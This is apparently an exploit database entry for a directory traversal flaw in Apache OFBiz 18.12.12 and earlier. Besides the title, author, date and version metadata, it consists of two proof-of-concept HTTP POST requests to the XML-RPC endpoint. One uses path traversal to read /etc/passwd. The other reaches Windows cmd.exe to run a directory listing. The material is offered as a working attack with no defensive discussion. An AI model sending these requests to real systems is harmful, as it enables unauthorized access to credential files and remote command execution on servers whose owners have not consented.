# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Vendor Homepage: https://ofbiz.apache.org/ ## Software Link: https://ofbiz.apache.org/download.html # Version: below <=18.12.12 # Tested on: Windows10 Poc. 1- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml example.createBlogPost ../../../../../../etc/passwd OR 2- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml performCommand ../../../../../../windows/system32/cmd.exe?/c+dir+c:\